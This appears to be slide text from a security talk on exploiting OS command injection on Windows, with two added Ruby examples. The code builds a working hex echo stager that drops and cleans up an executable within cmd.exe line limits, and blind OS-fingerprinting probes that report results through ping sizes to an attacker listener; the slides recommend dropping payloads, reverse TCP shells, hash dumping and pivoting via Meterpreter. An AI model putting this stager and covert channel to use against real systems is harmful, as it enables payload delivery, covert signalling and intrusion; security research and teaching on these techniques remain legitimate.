Definition

Command injection is an attack method in which a hacker alters
dynamically generated content on a Web page by entering HTML
code into an input mechanism, such as a form field that lacks
effective validation constraints. A malevolent hacker (also known
as a cracker) can exploit that vulnerability to gain unauthorized
access to data or network resources. When users visit an affected
Web page, their browsers interpret the code, which may cause
malicious commands to execute on the users' computers and
across their networks.

(Note that this commonly quoted definition actually describes HTML
or script injection, i.e. cross-site scripting, rather than OS
command injection, which is the subject of this talk.)

Definition

An attack technique used to take advantage of a vulnerability
which results in the execution of operating-system commands.

Our Focus

OS Command Injection (to be specific)
Windows Operating Systems
Less useful toolset to work with compared to UNIX, Linux, etc.
(no wget, curl, netcat or base64 installed by default on these versions)
Harder to work with post exploitation

Examples

CVE-2009-3845 - HP OpenView NNM Perl CGI
CVE-2008-5516 - gitweb, the common repository web interface used by
open source projects
CVE-2007-3670 - The infamous IE "firefoxurl://" protocol handler bug;
spawned many related issues

Current Exploits

Typically a low level of sophistication
Most are for Unix/Linux environments
Most use network related commands for file transfer, etc.

Exploitation Considerations

Some Operating Systems only offer a small set of commands

Command length limits (cmd.exe, per Microsoft KB 830473):
XP / Win2k3 / Vista: 8191 characters
Win2k: 2047 characters
Win95 / 98: 127 characters (command.com)

Blind injections (no command output comes back to us)

Exploitation Considerations

Commands available on all Operating System targets
Common command flags
Writable/Executable directories
Metacharacter Filters

Going Beyond Simple Commands

Upload binary payloads
Gives us more options
More features
Meterpreter FTW!!!







WScript

Network FU

FTP/TFTP
Fileshares
Mount Remote Drives
rep

Pros

Fast downloads
Easily scripted
Low Overhead (no encoding needed)

Cons

Firewalls
Web Filters
Reliability

Non-network Fu

Debug.exe (16-bit tool; not present on 64-bit Windows, including Vista/7 x64)
WScript
Scripting.FileSystemObject
batch2binary

Pros

Use existing connection
Bypasses firewalls
Works in harsh environments

Cons

Slower downloads (need to use buffering to prevent errors)
Complex scripting
Overhead (binary to ASCII conversion)

Designing a Command Stager

Must be reliable
Capable of sending any potential payload
Reuse existing connections (bypass firewalls)
Clean up after itself (Non-persistent)
Stream buffering of data
Reasonably fast

Binary to ASCII Conversion

Could use base64
ASCII representation of hex (the byte 0x35 becomes the two ASCII
bytes 0x33 0x35, i.e. the text "35"; no shell metacharacters, no quoting)
Ruby: hex = exe.unpack("H*")[0]
Many options

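Worked example for the "Designing a Command Stager" and "Binary to ASCII Conversion" slides. This is added here and is not code from the original talk or from Metasploit's own command stagers: a small hex stager in Ruby that encodes a binary exactly as the slide's `unpack("H*")` line does and splits it into `echo` lines that each stay within the target's cmd.exe command-line limit. The drop path, the sample payload and the `simulate_target` reassembly (which stands in for the decoder you would really drop with debug.exe or a WScript stub) are assumptions made for illustration.

```ruby
# Added example, not from the original slides or Metasploit.
# Hex command stager: binary -> ASCII hex -> echo lines sized for cmd.exe.

# cmd.exe command-line limits (Microsoft KB 830473); 9x command.com is 127.
LINE_LIMITS = { xp_or_later: 8191, win2k: 2047, win9x: 127 }.freeze

# Same encoding as the slide: each payload byte becomes two ASCII hex chars,
# so the stream carries no shell metacharacters and needs no quoting.
def hex_encode(bin)
  bin.unpack("H*")[0]
end

# Build the echo commands for one payload. The first line uses ">" so a
# stale file from an earlier attempt is truncated; later lines append.
# Every line, including "echo " and the redirection, fits within +limit+.
def stage_commands(bin, dest, limit)
  prefix = "echo "
  suffix = ">>#{dest}"                       # worst-case (longest) redirection
  payload_len = limit - prefix.length - suffix.length
  raise ArgumentError, "limit #{limit} too small for #{dest}" if payload_len < 2
  payload_len -= payload_len % 2             # never split a byte across lines
  hex_encode(bin).scan(/.{1,#{payload_len}}/).each_with_index.map do |chunk, i|
    "#{prefix}#{chunk}#{i.zero? ? '>' : '>>'}#{dest}"
  end
end

# Non-persistent: remove the dropped hex file once it has been decoded.
def cleanup_command(dest)
  "del /q #{dest}"
end

# Stand-in for the target's cmd.exe (an assumption for this example): replays
# the echo lines into an in-memory file table. cmd.exe's echo appends CRLF,
# which is why the decoder must strip line endings before converting back.
def simulate_target(commands)
  files = {}
  commands.each do |cmd|
    m = cmd.match(/\Aecho (\h*)(>>?)(\S+)\z/) or next
    text, op, path = m.captures
    files[path] = String.new if op == ">" || !files.key?(path)
    files[path] << text << "\r\n"
  end
  files
end

# What the dropped decoder (debug.exe script or WScript stub) does on the
# target: strip line endings and turn the hex back into bytes.
def decode_hex_file(text)
  [text.delete("\r\n")].pack("H*")
end

if $PROGRAM_NAME == __FILE__
  payload = (0..255).to_a.pack("C*") * 4          # constructed 1 KiB "binary"
  dest = 'C:\Temp\stage.hex'
  cmds = stage_commands(payload, dest, LINE_LIMITS[:win2k])
  puts "#{cmds.length} echo lines, longest #{cmds.map(&:length).max} chars"
  recovered = decode_hex_file(simulate_target(cmds)[dest])
  puts "round trip #{recovered == payload ? 'ok' : 'FAILED'}; then: #{cleanup_command(dest)}"
end
```

Sizing every line against the cmd.exe limit is what keeps the stager reliable on Win2k, where a single over-long line is rejected outright and the whole transfer silently fails; the injection point itself (URL length, form field size) may impose a smaller limit, in which case pass that instead.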
OS Detection

We can use 'if exist' to detect the OS
Check for debug.exe (XP or prior)
Echo a 2048 byte long line to a file: succeeds on XP (8191 limit)
Echo a 2048 byte long line to a file: fails with "The input line is
too long" on Win2k or prior (2047 limit), so only a < 2048 byte line works
Boot.ini grep/find for a string (XP and prior; Vista and later use the
BCD store and have no boot.ini)

Using Covert Channels

Ping.exe can be used to send messages fairly reliably
Even the harshest of environments typically allow outgoing ICMP
We can use packet size (ping -l <bytes>) as our status indicator
Using the number of packets to send is overkill

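Worked example covering the "OS Detection" and "Using Covert Channels" slides together, added here and not taken from the original talk: each `if exist` probe is a cmd.exe one-liner that reports its answer through the size of a single outgoing ping, so the fingerprint works in a fully blind injection. The listener address, the status-code table and the temp path are assumptions chosen for illustration; the observed sizes fed to `classify` are a constructed capture, not real data.

```ruby
# Added example, not from the original slides: blind OS fingerprinting where
# each probe reports its result through the size of one outgoing ping.
# Listener address, status codes and temp path are assumptions for illustration.

LISTENER  = "192.0.2.10"   # assumed attacker host (RFC 5737 documentation range)
BASE_SIZE = 100            # ping -l payload size that carries status code 0

# Status codes, carried as BASE_SIZE + code bytes of ICMP echo payload.
CODES = {
  debug_present: 1, debug_absent: 2,
  bootini_present: 3, bootini_absent: 4,
  long_line_ok: 5,
}.freeze

# One echo request whose data length encodes the status (ping -n 1 -l <size>).
def beacon(status)
  "ping -n 1 -l #{BASE_SIZE + CODES.fetch(status)} #{LISTENER}"
end

# cmd.exe one-liners to send through the injection point. Nothing has to come
# back over the injected channel; the answer is the ping size seen by the listener.
def probe_commands(tmp = '%TEMP%\probe.txt')
  [
    # debug.exe check from the slide (present on XP and prior 32-bit systems)
    "if exist %SystemRoot%\\system32\\debug.exe (#{beacon(:debug_present)}) else (#{beacon(:debug_absent)})",
    # boot.ini exists through XP/2003; Vista and later use the BCD store instead
    "if exist %SystemDrive%\\boot.ini (#{beacon(:bootini_present)}) else (#{beacon(:bootini_absent)})",
    # 2048-byte echo: on a 2047-char cmd.exe (Win2k or prior) the entire line is
    # rejected as too long, so the beacon never fires; on XP+ (8191) it does.
    "echo #{'A' * 2048}>#{tmp}&&#{beacon(:long_line_ok)}&&del /q #{tmp}",
  ]
end

# Turn the ICMP payload sizes observed at the listener (e.g. from a packet
# capture) into an OS guess. Sizes outside the code table are ignored.
def classify(sizes)
  seen = sizes.map { |s| CODES.key(s - BASE_SIZE) }.compact
  return :vista_or_later if seen.include?(:bootini_absent)
  return :unknown        unless seen.include?(:bootini_present)
  seen.include?(:long_line_ok) ? :xp_or_2003 : :win2k_or_prior
end

if $PROGRAM_NAME == __FILE__
  probe_commands.each { |c| puts c[0, 110] + (c.length > 110 ? "..." : "") }
  observed = [101, 103, 105]                   # constructed capture: XP-like target
  puts "guess: #{classify(observed)}"
end
```

The guess feeds straight into the stager's line limit: a :win2k_or_prior answer means every echo line has to stay under 2047 characters, while :xp_or_2003 allows 8191. Keep BASE_SIZE well above the default 32-byte ping payload so a stray ordinary ping from the target is never mistaken for a status.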
Plan of Attack

The most reliable option is Non-Network Fu
WScript decoder stub (decode a base64 encoded file)
Drop the payload as an executable file and run it
Reverse TCP connections are probably best (Reverse TCP All Ports
even better)

Demo time

Code

Meterpreter FTW!

An agent which provides a lot of post exploitation capabilities
Dump Hashes
Upload/Download files
Pivoting
Local Privilege Escalation

Conclusion

Current command injection exploitation techniques are lacking
Reusing existing connections is more reliable
WScript (Windows Script Host) is on all Windows operating systems
Meterpreter Rocks for post exploitation!

Questions